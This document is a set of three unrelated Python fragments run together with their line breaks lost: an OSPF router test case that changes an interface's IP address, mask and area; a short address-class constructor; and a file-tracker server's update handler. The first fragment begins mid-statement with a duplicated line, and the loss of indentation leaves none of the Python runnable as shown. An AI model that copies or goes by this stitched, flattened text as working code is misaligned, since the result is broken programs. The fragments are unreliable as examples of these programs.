topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] = str( IPv4Address(unicode(intf_ip.split("/")[0])) + 3 ) + "/{}".format(intf_ip.split("/")[1]) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "s1": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"][ "s1" ]["ipv4"].split("/")[0], "ipAddressPrefixlen": int( topo_modify_change_ip["routers"]["r0"]["links"]["s1"][ "ipv4" ].split("/")[1] ), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Modify the mask on the R0 interface") ip_addr = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] mask = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": ip_addr, "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] = str( IPv4Address(unicode(intf_ip.split("/")[0])) + 3 ) + "/{}".format(int(intf_ip.split("/")[1]) + 1) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "s1": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"][ "s1" ]["ipv4"].split("/")[0], "ipAddressPrefixlen": int( topo_modify_change_ip["routers"]["r0"]["links"]["s1"][ "ipv4" ].split("/")[1] ), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the area id on the interface") input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"area": "0.0.0.3"}, "delete": True, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"area": "0.0.0.2"}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": {"links": {"s1": {"ospf": {"area": "0.0.0.2", "ospfEnabled": True}}}} } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) write_test_footer(tc_name)
def __init__(self, if_name): IPv4Address.__init__(self, 0) AutoAddress.__init__(self, if_name)
def api_updatetracker(self, fname, start_bytes, end_bytes, ip, port): """Implements the updatetracker API command. All arguments are expected to be strings, but *start_bytes*, *end_bytes*, and *port* should be castable to :class:`int` and *ip* should be castable to :class:`~ipaddress.IPv4Address`. """ fname = str(fname) try: start_bytes, end_bytes, port = map(int, (start_bytes, end_bytes, port)) except ValueError: print("Either start_bytes ({!r}), end_bytes ({!r}), or port ({!r})"\ " is not a valid integer".format(start_bytes,end_bytes,port)) self.request.sendall(b"<updatetracker fail>") return try: ip = IPv4Address(ip) except AddressValueError: print("Malformed IP Address: {!r}".format(ip)) self.request.sendall(b"<updatetracker fail>") return tfname = "{}.track".format(fname) tfpath = os.path.join(self.server.torrents_dir, tfname) #check if .track file exists if not os.path.exists(tfpath): print("Can't update tracker file, doesn't exist") self.request.sendall(b"<updatetracker ferr>") return #create trackerfile from existing tracker try: tf = trackerfile.trackerfile.fromPath(tfpath) except Exception as err: print(err) self.request.sendall(b"<updatetracker fail>") return #clean trackerfile tf.clean() #add peer peer try: tf.updatePeer(ip, port, start_bytes, end_bytes) except Exception as err: print(err) self.request.sendall(b"<updatetracker fail>") return print("Added {} (creator) to trackerfile".format(ip)) #write tracker to file with open(tfpath, 'w') as fl: fcntl.lockf(fl, fcntl.LOCK_EX) tf.writeTo(fl) fcntl.lockf(fl, fcntl.LOCK_UN) print("Wrote trackerfile to disk.") self.request.sendall(b"<updatetracker succ>") return